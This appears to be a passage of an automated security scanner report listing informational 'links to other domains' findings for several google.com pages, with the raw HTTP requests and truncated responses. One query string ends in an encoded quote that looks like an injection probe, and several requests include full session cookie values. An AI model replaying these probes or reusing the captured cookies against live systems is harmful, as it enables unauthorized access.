<a class=title href="http://www.latimes.com/business/la-fi-mozilo-settlement-20110203,0,1090081.story" rel=nofollow id=n-hp- >Two former Countrywide executives settle California lawsuit for $6.5 million</a>
...[SNIP]...
<div>
<a class=title href="http://www.chicagotribune.com/business/ct-biz-0203-hospira-earnings-20110203,0,5818880.story" rel=nofollow id=n-hp- >Hospira's stock slides as 4Q profit tumbles</a>
...[SNIP]...
</a> -
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

17.259. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/finance?hl\x3den\x26tab\x3dwe\x22

The response contains the following links to other domains:

http://blogs.wsj.com/marketbeat/2011/02/02/adp-jobs-report-shows-hottish-job-market-but-is-it-hot/
http://galvestondailynews.com/story.lasso?ewcd=e1da7df15449d254
http://googlefinanceblog.blogspot.com/
http://online.wsj.com/article/AP3cfa65b94016498db4be80671e068353.html
http://www.bloomberg.com/news/2011-02-02/time-warner-profit-beats-estimates-after-potter-tv-ad-gain.html
http://www.chron.com/disp/story.mpl/ap/tx/7409096.html
http://www.examiner.com/economy-in-national/adp-reports-slowdown-employment-growth
http://www.ft.com/cms/s/0/688f30e4-2ed3-11e0-9877-00144feabdc0.html?ftcamp=rss
http://www.google.ca/finance
http://www.reuters.com/article/2011/02/02/us-usa-economy-instant-idUSTRE71142D20110202
http://www.thestreet.com/story/10992951/1/stock-market-story-feb-2.html
http://www.upi.com/Business_News/2011/02/02/Economy-adds-187000-jobs-in-January/UPI-67861296659051/
http://www.youtube.com/?hl=en&tab=e1

Request

GET /finance?hl\x3den\x26tab\x3dwe\x22 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Wed, 02 Feb 2011 15:53:18 GMT
Expires: Wed, 02 Feb 2011 15:53:18 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span class=name>
<a href="http://www.ft.com/cms/s/0/688f30e4-2ed3-11e0-9877-00144feabdc0.html?ftcamp=rss" rel=nofollow id=n-hp- >Small business hiring lifts US private payrolls</a>
...[SNIP]...
<div class=rel-article>
<a href="http://www.examiner.com/economy-in-national/adp-reports-slowdown-employment-growth" rel=nofollow id=n-hp- >ADP reports slowdown in employment growth</a>
...[SNIP]...
<div class=rel-article>
<a href="http://www.reuters.com/article/2011/02/02/us-usa-economy-instant-idUSTRE71142D20110202" rel=nofollow id=n-hp- >Instant View: Jan private sector payrolls up 187000</a>
...[SNIP]...
<span class=byline>
<a href="http://www.upi.com/Business_News/2011/02/02/Economy-adds-187000-jobs-in-January/UPI-67861296659051/" rel=nofollow class=rel id=n-hp- >UPI.com</a>  
<a href="http://blogs.wsj.com/marketbeat/2011/02/02/adp-jobs-report-shows-hottish-job-market-but-is-it-hot/" rel=nofollow class=rel id=n-hp- >Wall Street Journal (blog)</a>
...[SNIP]...
<div>
<a class=title href="http://www.thestreet.com/story/10992951/1/stock-market-story-feb-2.html" rel=nofollow id=n-hp- >Stock Market Story: Feb. 2</a>
...[SNIP]...
<div>
<a class=title href="http://www.bloomberg.com/news/2011-02-02/time-warner-profit-beats-estimates-after-potter-tv-ad-gain.html" rel=nofollow id=n-hp- >Time Warner Profit Beats Estimates on Latest `Harry Potter' Film, Ad Sales</a>
...[SNIP]...
<div>
<a class=title href="http://www.chron.com/disp/story.mpl/ap/tx/7409096.html" rel=nofollow id=n-hp- >Oncor announces planned power outages across Texas</a>
...[SNIP]...
<div>
<a class=title href="http://online.wsj.com/article/AP3cfa65b94016498db4be80671e068353.html" rel=nofollow id=n-hp- >Flight cancellations pile up for another day</a>
...[SNIP]...
<div>
<a class=title href="http://galvestondailynews.com/story.lasso?ewcd=e1da7df15449d254" rel=nofollow id=n-hp- >BP to sell Texas City refinery</a>
...[SNIP]...
</a> -
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

17.260. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/finance?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=we

The response contains the following links to other domains:

http://googlefinanceblog.blogspot.com/
http://www.google.ca/finance
http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&hl=en&sa=N&tab=e1

Request

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Wed, 02 Feb 2011 15:53:08 GMT
Expires: Wed, 02 Feb 2011 15:53:08 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>millenium boston - Google Finance Search</title>
<meta name="Description" content="Get r
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&hl=en&sa=N&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a> -
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

17.261. http://www.google.com/ig/adde previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/ig/adde

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/ig/adde?moduleurl=hosting.gmodules.com/ig/gadgets/file/112976434836923773614/rtq.xml

The response contains the following links to other domains:

http://img0.gmodules.com/ig/images/igoogle_logo_sm.png
http://www.gmodules.com/gadgets/proxy?refresh=86400&url=http://www.robtex.com/i/rtgadget280x260.png&container=ig&gadget=http://hosting.gmodules.com/ig/gadgets/file/112976434836923773614/rtq.xml
http://www.google-analytics.com/ga.js
http://www.google-analytics.com/urchin.js

Request

GET /ig/adde?moduleurl=hosting.gmodules.com/ig/gadgets/file/112976434836923773614/rtq.xml HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; GZ=Z=0; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 04:46:26 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Server: igfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>iGoogle: Get robtex.com
...[SNIP]...
<a href="/ig" linkindex="0"><img alt="iGoogle" src="http://img0.gmodules.com/ig/images/igoogle_logo_sm.png" /></a>
...[SNIP]...
<span class="img-side"><img class="img-gadget"alt="robtex.com" src="http://www.gmodules.com/gadgets/proxy?refresh=86400&url=http://www.robtex.com/i/rtgadget280x260.png&container=ig&gadget=http://hosting.gmodules.com/ig/gadgets/file/112976434836923773614/rtq.xml" /><input type="hidden" name="n_32" value="url=http%3A//hosting.gmodules.com/ig/gadgets/file/112976434836923773614/rtq.xml"/>
...[SNIP]...
<br /><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://www.google-analytics.com/ga.js"> >
...[SNIP]...

17.262. http://www.google.com/images previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/images

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/images?q=millenium+boston&hl=en&prmd=ivnscm&source=lnms&tbs=isch:1&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=mode_link&ct=mode&cd=2&ved=0CCQQ_AUoAQ

The response contains the following links to other domains:

http://t0.gstatic.com/images?q=tbn:ANd9GcQd0-54CDQoFV1OxUHCTWxbC_4hGtbuLa77at5V9R-HceDQ3A
http://t0.gstatic.com/images?q=tbn:ANd9GcREX8vBpQq7b-M4t8UOKgrdfI6tgBagyYSB87tc5XwEEdkzlfY
http://t0.gstatic.com/images?q=tbn:ANd9GcSgOFb7ELwym2pX_LvNxGQDjCLrjg0rIDaFUcFvpGm9H-Wy6Q
http://t0.gstatic.com/images?q=tbn:ANd9GcTdehsD0qy6uwRvX6HDyQ3CCnWWzHzqtI2QbiTR5kgz0oyRX98
http://t1.gstatic.com/images?q=tbn:ANd9GcQeM5CuIojqErz8ndsTs6e0EClMWICPBfQjY8McqdQbGauS_8U
http://t2.gstatic.com/images?q=tbn:ANd9GcQSpmol8MBm9Oa6GRBlcvL1fREnkDFNP-Wu49uvWCUAfByBKi4
http://t2.gstatic.com/images?q=tbn:ANd9GcRwH2aeYs3JPpH476x2V5q6gDp88arj1Yp7hK721KUAu4MB8A
http://t2.gstatic.com/images?q=tbn:ANd9GcSLylTikZcSyzaNgwgswTGCB0aE1WY2kprMi8PX8iHXcAz-sxo
http://t3.gstatic.com/images?q=tbn:ANd9GcRNbfX_FXInXc6vXlMNP_dAWJ73P5wKcdAJsoFEy4OyB04Z3Q
http://t3.gstatic.com/images?q=tbn:ANd9GcRm0CRNN9hvm1E2llt_guAmmMyK4cBWFaHjPuQksomo-nLLsyc
http://t3.gstatic.com/images?q=tbn:ANd9GcRr9cbNG7oPf2UOWczmJKBvv0FLw4ly4MEamRNpV2SR9QdZbQ
http://t3.gstatic.com/images?q=tbn:ANd9GcTHwUUvqMwd0AP5MLbszzxJ2Bu-wh3JNBZfVmfQlPfJapIelis
http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&ie=UTF-8&sa=N&tab=i1

Request

GET /images?q=millenium+boston&hl=en&prmd=ivnscm&source=lnms&tbs=isch:1&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=mode_link&ct=mode&cd=2&ved=0CCQQ_AUoAQ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:52:59 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium boston - Google Search</title><script>window.google={kEI:"231JTYGqFoT7lweJ_4zYDw",kEXPI:"17259,27
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&ie=UTF-8&sa=N&tab=i1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div style="display:none"><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcTdehsD0qy6uwRvX6HDyQ3CCnWWzHzqtI2QbiTR5kgz0oyRX98" id=ipfANd9GcTdehsD0qy6uwRvX6HDyQ3CCnWWzHzqtI2QbiTR5kgz0oyRX98 width=120 height=90><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcRm0CRNN9hvm1E2llt_guAmmMyK4cBWFaHjPuQksomo-nLLsyc" id=ipfANd9GcRm0CRNN9hvm1E2llt_guAmmMyK4cBWFaHjPuQksomo-nLLsyc width=115 height=115><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcRNbfX_FXInXc6vXlMNP_dAWJ73P5wKcdAJsoFEy4OyB04Z3Q" id=ipfANd9GcRNbfX_FXInXc6vXlMNP_dAWJ73P5wKcdAJsoFEy4OyB04Z3Q width=143 height=95><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcSLylTikZcSyzaNgwgswTGCB0aE1WY2kprMi8PX8iHXcAz-sxo" id=ipfANd9GcSLylTikZcSyzaNgwgswTGCB0aE1WY2kprMi8PX8iHXcAz-sxo width=150 height=101><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcRr9cbNG7oPf2UOWczmJKBvv0FLw4ly4MEamRNpV2SR9QdZbQ" id=ipfANd9GcRr9cbNG7oPf2UOWczmJKBvv0FLw4ly4MEamRNpV2SR9QdZbQ width=129 height=86><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcQd0-54CDQoFV1OxUHCTWxbC_4hGtbuLa77at5V9R-HceDQ3A" id=ipfANd9GcQd0-54CDQoFV1OxUHCTWxbC_4hGtbuLa77at5V9R-HceDQ3A width=133 height=100><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcSgOFb7ELwym2pX_LvNxGQDjCLrjg0rIDaFUcFvpGm9H-Wy6Q" id=ipfANd9GcSgOFb7ELwym2pX_LvNxGQDjCLrjg0rIDaFUcFvpGm9H-Wy6Q width=130 height=92><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcTHwUUvqMwd0AP5MLbszzxJ2Bu-wh3JNBZfVmfQlPfJapIelis" id=ipfANd9GcTHwUUvqMwd0AP5MLbszzxJ2Bu-wh3JNBZfVmfQlPfJapIelis width=115 height=115><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t1.gstatic.com/images?q=tbn:ANd9GcQeM5CuIojqErz8ndsTs6e0EClMWICPBfQjY8McqdQbGauS_8U" id=ipfANd9GcQeM5CuIojqErz8ndsTs6e0EClMWICPBfQjY8McqdQbGauS_8U width=137 height=72><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcQSpmol8MBm9Oa6GRBlcvL1fREnkDFNP-Wu49uvWCUAfByBKi4" id=ipfANd9GcQSpmol8MBm9Oa6GRBlcvL1fREnkDFNP-Wu49uvWCUAfByBKi4 width=137 height=77><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcRwH2aeYs3JPpH476x2V5q6gDp88arj1Yp7hK721KUAu4MB8A" id=ipfANd9GcRwH2aeYs3JPpH476x2V5q6gDp88arj1Yp7hK721KUAu4MB8A width=126 height=88><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcREX8vBpQq7b-M4t8UOKgrdfI6tgBagyYSB87tc5XwEEdkzlfY" id=ipfANd9GcREX8vBpQq7b-M4t8UOKgrdfI6tgBagyYSB87tc5XwEEdkzlfY width=128 height=100></div>
...[SNIP]...

17.263. http://www.google.com/images previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/images

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/images?q=millenium+boston&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi

The response contains the following links to other domains:

http://t0.gstatic.com/images?q=tbn:ANd9GcQd0-54CDQoFV1OxUHCTWxbC_4hGtbuLa77at5V9R-HceDQ3A
http://t0.gstatic.com/images?q=tbn:ANd9GcREX8vBpQq7b-M4t8UOKgrdfI6tgBagyYSB87tc5XwEEdkzlfY
http://t0.gstatic.com/images?q=tbn:ANd9GcSgOFb7ELwym2pX_LvNxGQDjCLrjg0rIDaFUcFvpGm9H-Wy6Q
http://t0.gstatic.com/images?q=tbn:ANd9GcTdehsD0qy6uwRvX6HDyQ3CCnWWzHzqtI2QbiTR5kgz0oyRX98
http://t1.gstatic.com/images?q=tbn:ANd9GcQeM5CuIojqErz8ndsTs6e0EClMWICPBfQjY8McqdQbGauS_8U
http://t2.gstatic.com/images?q=tbn:ANd9GcQSpmol8MBm9Oa6GRBlcvL1fREnkDFNP-Wu49uvWCUAfByBKi4
http://t2.gstatic.com/images?q=tbn:ANd9GcRwH2aeYs3JPpH476x2V5q6gDp88arj1Yp7hK721KUAu4MB8A
http://t2.gstatic.com/images?q=tbn:ANd9GcSLylTikZcSyzaNgwgswTGCB0aE1WY2kprMi8PX8iHXcAz-sxo
http://t3.gstatic.com/images?q=tbn:ANd9GcRNbfX_FXInXc6vXlMNP_dAWJ73P5wKcdAJsoFEy4OyB04Z3Q
http://t3.gstatic.com/images?q=tbn:ANd9GcRm0CRNN9hvm1E2llt_guAmmMyK4cBWFaHjPuQksomo-nLLsyc
http://t3.gstatic.com/images?q=tbn:ANd9GcRr9cbNG7oPf2UOWczmJKBvv0FLw4ly4MEamRNpV2SR9QdZbQ
http://t3.gstatic.com/images?q=tbn:ANd9GcTHwUUvqMwd0AP5MLbszzxJ2Bu-wh3JNBZfVmfQlPfJapIelis
http://www.youtube.com/results?q=millenium+boston&um=1&hl=en&ie=UTF-8&sa=N&tab=i1

Request

GET /images?q=millenium+boston&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:52:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium boston - Google Search</title><script>window.google={kEI:"2H1JTam2DMOBlAf5srnlDw",kEXPI:"17259,27
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&um=1&hl=en&ie=UTF-8&sa=N&tab=i1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div style="display:none"><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcTdehsD0qy6uwRvX6HDyQ3CCnWWzHzqtI2QbiTR5kgz0oyRX98" id=ipfANd9GcTdehsD0qy6uwRvX6HDyQ3CCnWWzHzqtI2QbiTR5kgz0oyRX98 width=120 height=90><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcRm0CRNN9hvm1E2llt_guAmmMyK4cBWFaHjPuQksomo-nLLsyc" id=ipfANd9GcRm0CRNN9hvm1E2llt_guAmmMyK4cBWFaHjPuQksomo-nLLsyc width=115 height=115><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcRNbfX_FXInXc6vXlMNP_dAWJ73P5wKcdAJsoFEy4OyB04Z3Q" id=ipfANd9GcRNbfX_FXInXc6vXlMNP_dAWJ73P5wKcdAJsoFEy4OyB04Z3Q width=143 height=95><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcSLylTikZcSyzaNgwgswTGCB0aE1WY2kprMi8PX8iHXcAz-sxo" id=ipfANd9GcSLylTikZcSyzaNgwgswTGCB0aE1WY2kprMi8PX8iHXcAz-sxo width=150 height=101><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcRr9cbNG7oPf2UOWczmJKBvv0FLw4ly4MEamRNpV2SR9QdZbQ" id=ipfANd9GcRr9cbNG7oPf2UOWczmJKBvv0FLw4ly4MEamRNpV2SR9QdZbQ width=129 height=86><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcQd0-54CDQoFV1OxUHCTWxbC_4hGtbuLa77at5V9R-HceDQ3A" id=ipfANd9GcQd0-54CDQoFV1OxUHCTWxbC_4hGtbuLa77at5V9R-HceDQ3A width=133 height=100><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcSgOFb7ELwym2pX_LvNxGQDjCLrjg0rIDaFUcFvpGm9H-Wy6Q" id=ipfANd9GcSgOFb7ELwym2pX_LvNxGQDjCLrjg0rIDaFUcFvpGm9H-Wy6Q width=130 height=92><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcTHwUUvqMwd0AP5MLbszzxJ2Bu-wh3JNBZfVmfQlPfJapIelis" id=ipfANd9GcTHwUUvqMwd0AP5MLbszzxJ2Bu-wh3JNBZfVmfQlPfJapIelis width=115 height=115><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t1.gstatic.com/images?q=tbn:ANd9GcQeM5CuIojqErz8ndsTs6e0EClMWICPBfQjY8McqdQbGauS_8U" id=ipfANd9GcQeM5CuIojqErz8ndsTs6e0EClMWICPBfQjY8McqdQbGauS_8U width=137 height=72><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcQSpmol8MBm9Oa6GRBlcvL1fREnkDFNP-Wu49uvWCUAfByBKi4" id=ipfANd9GcQSpmol8MBm9Oa6GRBlcvL1fREnkDFNP-Wu49uvWCUAfByBKi4 width=137 height=77><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcRwH2aeYs3JPpH476x2V5q6gDp88arj1Yp7hK721KUAu4MB8A" id=ipfANd9GcRwH2aeYs3JPpH476x2V5q6gDp88arj1Yp7hK721KUAu4MB8A width=126 height=88><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcREX8vBpQq7b-M4t8UOKgrdfI6tgBagyYSB87tc5XwEEdkzlfY" id=ipfANd9GcREX8vBpQq7b-M4t8UOKgrdfI6tgBagyYSB87tc5XwEEdkzlfY width=128 height=100></div>
...[SNIP]...

17.264. http://www.google.com/language_tools previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/language_tools

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/language_tools?hl=en

The response contains the following links to other domains:

http://www.google.ad/
http://www.google.ae/
http://www.google.am/
http://www.google.as/
http://www.google.at/
http://www.google.az/
http://www.google.ba/
http://www.google.be/
http://www.google.bf/
http://www.google.bg/
http://www.google.bi/
http://www.google.bj/
http://www.google.bs/
http://www.google.by/
http://www.google.ca/
http://www.google.cd/
http://www.google.cf/
http://www.google.cg/
http://www.google.ch/
http://www.google.ci/
http://www.google.cl/
http://www.google.cm/
http://www.google.cn/
http://www.google.cz/
http://www.google.de/
http://www.google.dj/
http://www.google.dk/
http://www.google.dm/
http://www.google.dz/
http://www.google.ee/
http://www.google.es/
http://www.google.fi/
http://www.google.fm/
http://www.google.fr/
http://www.google.ga/
http://www.google.ge/
http://www.google.gg/
http://www.google.gl/
http://www.google.gm/
http://www.google.gp/
http://www.google.gr/
http://www.google.gy/
http://www.google.hn/
http://www.google.hr/
http://www.google.ht/
http://www.google.hu/
http://www.google.ie/
http://www.google.im/
http://www.google.is/
http://www.google.it/
http://www.google.je/
http://www.google.jo/
http://www.google.kg/
http://www.google.ki/
http://www.google.kz/
http://www.google.la/
http://www.google.li/
http://www.google.lk/
http://www.google.lt/
http://www.google.lu/
http://www.google.lv/
http://www.google.md/
http://www.google.me/
http://www.google.mg/
http://www.google.mk/
http://www.google.ml/
http://www.google.mn/
http://www.google.ms/
http://www.google.mu/
http://www.google.mv/
http://www.google.mw/
http://www.google.ne/
http://www.google.nl/
http://www.google.no/
http://www.google.nr/
http://www.google.nu/
http://www.google.pl/
http://www.google.pn/
http://www.google.ps/
http://www.google.pt/
http://www.google.ro/
http://www.google.rs/
http://www.google.ru/
http://www.google.rw/
http://www.google.sc/
http://www.google.se/
http://www.google.sh/
http://www.google.si/
http://www.google.sk/
http://www.google.sm/
http://www.google.sn/
http://www.google.st/
http://www.google.td/
http://www.google.tg/
http://www.google.tk/
http://www.google.tl/
http://www.google.tm/
http://www.google.to/
http://www.google.tt/
http://www.google.vg/
http://www.google.vu/
http://www.google.ws/
http://www.youtube.com/?hl=en&tab=w1

Request

GET /language_tools?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:51:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><title>Language Tools</title><meta http-equiv="content-type" content="text/html;charset=UTF-8"><style>@import url(http://www.google.com/css/modules/g-flag.css);ol.g-flag {display: block;ov
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<li><a href="http://www.google.ad"><span class="ad">
...[SNIP]...
<li><a href="http://www.google.ae"><span class="ae">
...[SNIP]...
<li><a href="http://www.google.am"><span class="am">
...[SNIP]...
<li><a href="http://www.google.as"><span class="as">
...[SNIP]...
<li><a href="http://www.google.at"><span class="at">
...[SNIP]...
<li><a href="http://www.google.az"><span class="az">
...[SNIP]...
